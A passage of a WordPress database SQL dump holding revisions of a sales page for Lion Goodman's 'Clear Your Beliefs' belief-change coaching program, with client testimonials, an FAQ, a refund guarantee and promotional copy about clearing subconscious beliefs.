couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-05-29 13:01:45', '2015-05-29 18:01:45', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2214, 2, '2015-05-29 13:14:36', '2015-05-29 18:14:36', '&nbsp;\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\n<p>\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this 